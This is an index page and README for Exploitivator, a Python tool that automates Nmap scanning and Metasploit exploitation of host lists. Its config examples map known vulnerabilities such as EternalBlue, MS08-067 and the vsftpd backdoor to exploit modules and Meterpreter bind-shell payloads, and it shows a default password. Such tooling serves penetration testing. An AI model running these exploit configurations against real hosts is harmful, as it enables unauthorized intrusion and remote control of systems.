Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/N1ckDunn/Exploitivator
Automate Metasploit scanning and exploitation
https://github.com/N1ckDunn/Exploitivator
Last synced: 3 months ago
JSON representation
Automate Metasploit scanning and exploitation
- Host: GitHub
- URL: https://github.com/N1ckDunn/Exploitivator
- Owner: N1ckDunn
- Created: 2019-11-01T10:43:45.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2024-04-29T09:26:29.000Z (6 months ago)
- Last Synced: 2024-05-13T19:34:54.516Z (6 months ago)
- Language: Python
- Size: 14.6 KB
- Stars: 108
- Watchers: 6
- Forks: 28
- Open Issues: 1
-
Metadata Files:
- Readme: ReadMe.md
Awesome Lists containing this project
- awesome-hacking-lists - N1ckDunn/Exploitivator - Automate Metasploit scanning and exploitation (Python)
README
Exploitivator
=============
Prerequisites
-------------
This has only been tested on Kali.
It depends on the msfrpc module for Python, described in detail here:
https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/
Install the necessary Kali packages and the PostgreSQL gem for Ruby:
apt-get install postgresql libpq-dev git-core
gem install pg
Install current version of the msfrpc Python module from git:
git clone git://github.com/SpiderLabs/msfrpc.git msfrpc
cd msfrpc/python-msfrpc
python setup.py install
Usage
-----
Before running either of the scripts, load msfconsole and start the MSGRPC service.
MSGRPC can be started with msfrpcd in Metasploit as follows:
load msgrpc Pass=abc123
The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).
Use MSFScan to run multiple Metasploit scans against a group of target hosts.
Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.
Exploitivator
-------------
Command line usage:
Examples:
The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:
./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123
MSFScan
-------
Command line usage:
./msf_scan.py filename
./msf_scan.py filename MSF_DB_Username MSF_DB_Password
Examples:
The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:
./msf_scan.py hosts.txt msf abc123
To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username(msf) and the script's default Metasploit Postgres password(abc123):
./msf_scan.py hosts.txt
Config Files
------------
Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks.
MSFScan
-------
The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans the are to run against the targets.
e.g.:
auxiliary/scanner/dcerpc/endpoint_mapper
auxiliary/scanner/smb/smb_version
auxiliary/scanner/x11/open_x11
auxiliary/scanner/discovery/ipv6_multicast_ping
auxiliary/scanner/discovery/ipv6_neighbor
auxiliary/scanner/smb/smb_login
Exploitivator
-------------
This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg).
These use '##' as a separator and have the following formats.
exploitivator_scan.cfg:
[Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used]
In the above format:
1) The first section is a label linking the scan to the exploit
2) The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script
3) The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
4) The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file
An example file content is shown below:
SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632\/open\/tcp\/\/distccd"
JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099\/open\/tcp\/\/rmi
VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"
exploitivator.cfg:
[Label]##[Metasploit exploit path]##[Optional - Metasploit payload details]
An example file content is shown below:
SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
References
----------
Starting and connecting to MSGRPC:
https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc
Setting RHOSTS to use a file instead of a range:
http://travisaltman.com/metasploit-set-rhosts-file/